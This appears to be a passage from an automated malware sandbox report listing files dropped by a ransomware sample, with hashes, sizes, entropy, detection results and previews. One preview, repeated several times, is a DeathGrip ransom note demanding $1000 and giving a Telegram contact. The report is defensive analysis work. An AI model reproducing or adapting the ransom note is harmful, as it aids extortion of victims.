                                                          SHA-512:FF330FDA99767E2DBC0D488DA3DB5B439D032EFFFA29F17A659F954748D0C273868147254EED8089D44374AD00613B4566905A19E003CCA9D63D7FBF4B109695
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58144
                                                          Entropy (8bit):7.9964602029403045
                                                          Encrypted:true
                                                          SSDEEP:1536:bQauVfYeehc3o24+Mp7b1WGm8f4zRDGf+H5WQFhDecqXMkCCx:uVf8c3o24tvTLfaIf+HIwYcqXME
                                                          MD5:4CFB81BCAF4727258AE7F692E966263D
                                                          SHA1:CC8049E36236821CBD8D46CDAC4B00CD6DFE1A54
                                                          SHA-256:865998F795D9409F41A9790AA3EF1A8B92D2729B779F863214349945A3FB9829
                                                          SHA-512:196620796C75C96319545FCECB2F2AEC3219F024451A6F64C31AC3217E11C7EB4A83979FD6A5F5571F8BBC2F0BB152F7DB2F1DDBE3406216A4FF2F41EB12F54B
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):117744
                                                          Entropy (8bit):7.998509202759884
                                                          Encrypted:true
                                                          SSDEEP:3072:bc3H8ipUxn9KSkx06kkbfjgg+yC+yE/FxbzpJUc:bc3Hmxn9z2kkbfjnryENhzpyc
                                                          MD5:44D49AA5BDFFED1A33899D3EE74AFD73
                                                          SHA1:9393B82644042BD98C90675A5B0EE81FCAC2F4CF
                                                          SHA-256:20494D8F434870362F8F4A2263D25706A1F206A541B59DC8896183F341ADCD86
                                                          SHA-512:4C892F9E998523699A9F4DBFA28D2A3E695D87C5959E612A6DDEB1030D67D29E7486089F05C03C757CB5E3E8B11CB44279571C8388F5F922EB883D90F24B7D07
                                                          Malicious:true
                                                          Preview:........7.?.<Z~g..(..'y^..o.<Vf1W.......?...e...c.?..M.YE......s7.....C..Wl........~......,...I..../.....\...^.y..>t...v.N.......[.....-Ey{.:/j.I6..=.?..|.K.{.x.P.nk...........b..;...G...QMz.)..d..|.My.n.J...u.a..q.6.N!..#0.....8..}jr...#.4d..Q.....+lS.W7.[n...d.[jm.....b..GSUV...h.iM2..^@.......Um.....Y....J........l..../k...=.n~...w*x.o..W..NW...buK.....76.y.f...i.9x>4...'.t.....sF..O..3..p....p.vk.).^....5J.z.O....`V_.f.......P.!..W..#s;.z..}.y$.Vi.'..B.y.f...s`DAVl..S....0!..FD"+.l,.....mE....@..`..'......-..9k.....K.l..>b-7...;..r...dj.?.(..T....,.2...$..8F_..'0...U.lT.r.:.ui)ZA3.>.."..Z...../.*cP|...c..|...Txhp._.u..=..0......:.,..{x0....T..x,&..N&w].?..K@.L..*...U.}j;..[...U".%|Di/...2..F..DB.yg%.q9.{....<..6on....3...6...I..X... 1p....:.e..i..'.....b....).co.}...+.02.-.l(.s........=!uu.."/^....|sQ....{....YP..!&.r.Z.........J..gu.......o..Ir.?.D..'...6.g.......Q..t..#..ud9.8K.n:2......R.t.. _|..Yb..]`M....H....i.CGS.8.. $...H:.
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11264
                                                          Entropy (8bit):4.703513333396807
                                                          Encrypted:false
                                                          SSDEEP:96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
                                                          MD5:6176101B7C377A32C01AE3EDB7FD4DE6
                                                          SHA1:5F1CB443F9D677F313BEC07C5241AEAB57502F5E
                                                          SHA-256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
                                                          SHA-512:3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: 0U9NY2PzhK.exe, Detection: malicious
                                                          • Filename: qlk8old6p9.exe, Detection: malicious
                                                          • Filename: tjigfd64.exe, Detection: malicious
                                                          • Filename: tjigfd64.exe, Detection: malicious
                                                          • Filename: neverlose.exe, Detection: malicious
                                                          • Filename: dXaIbmbdKj.exe, Detection: malicious
                                                          • Filename: visabuilder.exe, Detection: malicious
                                                          • Filename: allchecker.exe, Detection: malicious
                                                          • Filename: LisectAVT_2403002A_396.exe, Detection: malicious
                                                          • Filename: 00#U2800.exe, Detection: malicious
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13312
                                                          Entropy (8bit):4.968452734961967
                                                          Encrypted:false
                                                          SSDEEP:96:JF3TgNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDqbwYH/kcX6gT:WF/1nb2mhQtkXHTeZ87VDqrMcqgYvEp
                                                          MD5:371776A7E26BAEB3F75C93A8364C9AE0
                                                          SHA1:BF60B2177171BA1C6B4351E6178529D4B082BDA9
                                                          SHA-256:15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
                                                          SHA-512:C23548FBCD1713C4D8348917FF2AB623C404FB0E9566AB93D147C62E06F51E63BDAA347F2D203FE4F046CE49943B38E3E9FA1433F6455C97379F2BC641AE7CE9
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13824
                                                          Entropy (8bit):5.061461040216793
                                                          Encrypted:false
                                                          SSDEEP:192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
                                                          MD5:CB5238E2D4149636377F9A1E2AF6DC57
                                                          SHA1:038253BABC9E652BA4A20116886209E2BCCF35AC
                                                          SHA-256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
                                                          SHA-512:B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13824
                                                          Entropy (8bit):5.236167046748013
                                                          Encrypted:false
                                                          SSDEEP:192:/siHXqpoUol3xZhRyQX5lDnRDFYav+tcqgRvE:h6D+XBDgDgRvE
                                                          MD5:D9E7218460AEE693BEA07DA7C2B40177
                                                          SHA1:9264D749748D8C98D35B27BEFE6247DA23FF103D
                                                          SHA-256:38E423D3BCC32EE6730941B19B7D5D8872C0D30D3DD8F9AAE1442CB052C599AD
                                                          SHA-512:DDB579E2DEA9D266254C0D9E23038274D9AE33F0756419FD53EC6DC1A27D1540828EE8F4AD421A5CFFD9B805F1A68F26E70BDC1BAB69834E8ACD6D7BB7BDB0DB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.558176937399355
                                                          Encrypted:false
                                                          SSDEEP:384:Dz2P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuCLg46:DzeqWB7YJlmLJ3oD/S4j990th9VCsC
                                                          MD5:F751792DF10CDEED391D361E82DAF596
                                                          SHA1:3440738AF3C88A4255506B55A673398838B4CEAC
                                                          SHA-256:9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
                                                          SHA-512:6159F245418AB7AD897B02F1AADF1079608E533B9C75006EFAF24717917EAA159846EE5DFC0E85C6CFF8810319EFECBA80C1D51D1F115F00EC1AFF253E312C00
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15872
                                                          Entropy (8bit):5.285191078037458
                                                          Encrypted:false
                                                          SSDEEP:192:wJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4jqccqgwYUMvEW:ikRwi3wO26Ef+yuIm9PfD7wgwYUMvE
                                                          MD5:BBEA5FFAE18BF0B5679D5C5BCD762D5A
                                                          SHA1:D7C2721795113370377A1C60E5CEF393473F0CC5
                                                          SHA-256:1F4288A098DA3AAC2ADD54E83C8C9F2041EC895263F20576417A92E1E5B421C1
                                                          SHA-512:0932EC5E69696D6DD559C30C19FC5A481BEFA38539013B9541D84499F2B6834A2FFE64A1008A1724E456FF15DDA6268B7B0AD8BA14918E2333567277B3716CC4
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):5.505471888568532
                                                          Encrypted:false
                                                          SSDEEP:192:vd9VkyQ5f8vjVaCHpKpTTjaNe7oca2DW3Q2dhmdcqgwNeecBih:JkP5cjIGpKlqD2D4kzgwNeE
                                                          MD5:D2175300E065347D13211F5BF7581602
                                                          SHA1:3AE92C0B0ECDA1F6B240096A4E68D16D3DB1FFB0
                                                          SHA-256:94556934E3F9EE73C77552D2F3FC369C02D62A4C9E7143E472F8E3EE8C00AEE1
                                                          SHA-512:6156D744800206A431DEE418A1C561FFB45D726DC75467A91D26EE98503B280C6595CDEA02BDA6A023235BD010835EA1FC9CB843E9FEC3501980B47B6B490AF7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):20992
                                                          Entropy (8bit):6.06124024160806
                                                          Encrypted:false
                                                          SSDEEP:384:bUv5cJMOZA0nmwBD+XpJgLa0Mp8Qpg4P2llyM:0K1XBD+DgLa1yTi
                                                          MD5:45616B10ABE82D5BB18B9C3AB446E113
                                                          SHA1:91B2C0B0F690AE3ABFD9B0B92A9EA6167049B818
                                                          SHA-256:F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
                                                          SHA-512:ACEA8C1A3A1FA19034FD913C8BE93D5E273B7719D76CB71C36F510042918EA1D9B44AC84D849570F9508D635B4829D3E10C36A461EC63825BA178F5AC1DE85FB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):25088
                                                          Entropy (8bit):6.475467273446457
                                                          Encrypted:false
                                                          SSDEEP:384:oc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy4IYgLWi:B6H1TZXX5XmrXA+NNxWiFdLWi
                                                          MD5:CF3C2F35C37AA066FA06113839C8A857
                                                          SHA1:39F3B0AEFB771D871A93681B780DA3BD85A6EDD0
                                                          SHA-256:1261783F8881642C3466B96FA5879A492EA9E0DAB41284ED9E4A82E8BCF00C80
                                                          SHA-512:1C36B80AAE49FD5E826E95D83297AE153FDB2BC652A47D853DF31449E99D5C29F42ED82671E2996AF60DCFB862EC5536BB0A68635D4E33D33F8901711C0C8BE6
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):4.838534302892255
                                                          Encrypted:false
                                                          SSDEEP:192:0F/1nb2mhQtkr+juOxKbDbnHcqgYvEkrK:u2f6iuOsbDtgYvEmK
                                                          MD5:20708935FDD89B3EDDEEA27D4D0EA52A
                                                          SHA1:85A9FE2C7C5D97FD02B47327E431D88A1DC865F7
                                                          SHA-256:11DD1B49F70DB23617E84E08E709D4A9C86759D911A24EBDDFB91C414CC7F375
                                                          SHA-512:F28C31B425DC38B5E9AD87B95E8071997E4A6F444608E57867016178CD0CA3E9F73A4B7F2A0A704E45F75B7DCFF54490510C6BF8461F3261F676E9294506D09B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13824
                                                          Entropy (8bit):4.9047185025862925
                                                          Encrypted:false
                                                          SSDEEP:192:NRgPX8lvI+KnwSDTPUDEhKWPXcqgzQkvEd:2og9rUD9mpgzQkvE
                                                          MD5:43BBE5D04460BD5847000804234321A6
                                                          SHA1:3CAE8C4982BBD73AF26EB8C6413671425828DBB7
                                                          SHA-256:FAA41385D0DB8D4EE2EE74EE540BC879CF2E884BEE87655FF3C89C8C517EED45
                                                          SHA-512:DBC60F1D11D63BEBBAB3C742FB827EFBDE6DFF3C563AE1703892D5643D5906751DB3815B97CBFB7DA5FCD306017E4A1CDCC0CDD0E61ADF20E0816F9C88FE2C9B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14848
                                                          Entropy (8bit):5.300163691206422
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):57856
                                                          Entropy (8bit):4.260220483695234
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):58368
                                                          Entropy (8bit):4.276870967324261
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):10752
                                                          Entropy (8bit):4.578113904149635
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):6.143719741413071
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):17920
                                                          Entropy (8bit):5.353267174592179
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):4.741247880746506
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14848
                                                          Entropy (8bit):5.212941287344097
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14336
                                                          Entropy (8bit):5.181291194389683
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14336
                                                          Entropy (8bit):5.140195114409974
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13824
                                                          Entropy (8bit):5.203867759982304
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15360
                                                          Entropy (8bit):5.478301937972917
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):18432
                                                          Entropy (8bit):5.69608744353984
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
